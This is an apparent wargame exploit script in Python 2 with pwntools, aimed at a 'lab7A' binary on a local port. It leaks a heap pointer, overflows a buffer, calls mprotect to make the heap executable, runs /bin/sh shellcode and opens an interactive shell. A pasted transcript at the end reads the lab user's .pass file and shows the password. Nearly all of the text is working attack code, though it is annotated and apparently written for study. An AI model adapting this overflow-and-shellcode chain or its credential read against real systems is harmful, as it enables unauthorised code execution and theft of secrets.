from pwn import *
import struct
from binascii import hexlify as hexa
# context.log_level = 'debug'
# Exploit script for the "lab7A" lab binary: drives a menu-driven service over
# TCP, uses a pointer leaked in the service output to compute a heap-relative
# address, and then sends two crafted payloads. The file is Python 2 only:
# `print` is used as a statement and `raw_input` is called below, and every
# payload is a `str`. All addresses and offsets are hard-coded for one specific
# build of the target (the 0x08xxxxxx values look like a non-PIE 32-bit
# layout -- confirm against the binary), so nothing here transfers elsewhere.
#
# 28 raw bytes that are appended to `pattern2` further down and sent verbatim;
# the literal contains the "/bin//sh" string. Nothing in this script inspects
# or modifies it.
shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80'
# Local-process variant left commented out; the live target is a listener on
# the loopback interface, port 7741.
# p = process('./lab7A')
p = remote("127.0.0.1", 7741)
# Blocks before any traffic is sent (Python 2 builtin). Presumably a hook to
# attach a debugger to the service first -- the script does not say.
raw_input('Press Enter')
# First menu round. Each recvuntil(':') waits for the next prompt, then a menu
# choice or value is sent. The prompt texts and menu semantics are not visible
# here; '131' followed by 'C'*131 reads like a length followed by a buffer of
# that length -- verify against the target.
p.recvuntil(':')
p.sendline('1')
p.recvuntil(':')
p.sendline('131')
p.recvuntil(':')
p.sendline('C'*131)
p.recvuntil(':')
p.sendline('1')
# The next two lines are sent back-to-back without waiting for a prompt.
p.sendline('4')
p.sendline('A'*3)
p.recvuntil(':')
# Forged record used later (sent at the `p.sendline(stack)` below): "1", a NUL,
# six filler bytes, then three little-endian 32-bit addresses (pwntools p32).
# How the target interprets the three words is not visible in this script;
# the values are build-specific constants.
stack = '1' + '\x00' + 'A'*6+p32(0x8050bf0)+p32(0x8049569)+p32(0x80eef60)
p.sendline('2')
p.recvuntil(':')
p.sendline('0')
p.recvuntil(':')
# `pattern` is 132 bytes of filler, two zero dwords and one 4-byte address --
# a layout consistent with an overflow that overwrites a saved return address.
# `gadget` is reused unchanged in `pattern2`.
gadget = p32(0x0807e372)
pattern = 'D'*132 + p32(0x0) + p32(0x0) + gadget
p.sendline(pattern)
p.sendline('4')
p.recvuntil(':')
# Python 2 print statement: dumps the service output up to the next prompt.
print p.recvuntil('Enter Choice: ')
p.sendline(stack)
# Leak handling. The four bytes at offset 73 of the response are treated as a
# pointer; that offset assumes the surrounding output never changes length.
# hexlify -> bytearray.fromhex -> reverse -> unpack(">L") byte-swaps the
# little-endian value into a host integer (a plain little-endian unpack would
# give the same result). Subtracting 0x19d8 rebases the leaked pointer to what
# the script calls the heap address; that delta is specific to this build.
leak = p.recvuntil('Enter Choice: ')
heap = leak[73:73+4]
print hexa(heap)
ba = bytearray.fromhex(hexa(heap))
ba.reverse()
print 'Heap address: ' + hex(struct.unpack(">L",ba)[0]-0x19d8)
# mprotect(heap_address, size, flag (rwx = 0x7))
# Address execution should continue at once the call above returns:
# heap address + 0x1aec, again a build-specific offset.
return_after_mprotect = p32(struct.unpack(">L",ba)[0]-0x19d8+0x1aec)
print 'Return_after_mprotect: ' + hex(struct.unpack(">L",ba)[0]-0x19d8+0x1aec)
# Second forged record: same prefix as `stack`, then five words laid out like a
# call frame -- 0x806f340 (presumably mprotect, going by the comment above),
# the return address computed just above, and three arguments: the heap
# address, a length of 0x22000 and protection 0x7 (rwx). Re-protecting the
# heap as executable is what this stage relies on; a non-executable heap is
# the mitigation that would otherwise stop the raw bytes appended in
# `pattern2` from ever running.
stack2 = '1' + '\x00' + 'A'*6+p32(0x806f340)+return_after_mprotect+p32(struct.unpack(">L",ba)[0]-0x19d8)+p32(0x22000)+p32(0x7)
# Replay of both menu rounds with most of the prompt waits dropped. Note the
# small differences from round one ('C'*130 instead of 131, 'A'*4 instead of
# 3); whether they are deliberate is not stated anywhere in the script.
p.sendline('1')
p.sendline('131')
p.sendline('C'*130)
p.sendline('1')
p.sendline('4')
p.sendline('A'*4)
p.recvuntil('Enter Choice: ')
p.sendline('2')
p.sendline('0')
# Same shape as `pattern`, with the raw bytes from the top of the file appended
# after the gadget address.
pattern2 = 'D'*132 + p32(0x0) + p32(0x0) + gadget + shellcode
p.sendline(pattern2)
p.sendline('4')
p.sendline(stack2)
p.recvuntil('Enter Choice: ')
# Hands the connection to the user; the socket is never explicitly closed.
p.interactive()
# Bare module-level string: a pasted session transcript kept as a record. It
# is never executed or sent, but it does embed the lab's password in source
# control -- the same class of problem as committing any other secret.
'''
$ id
uid=1028(lab7end) gid=1029(lab7end) groups=1029(lab7end),1001(gameuser)
$ cat /home/lab7end/.pass
0verfl0wz_0n_th3_h3ap_4int_s0_bad
'''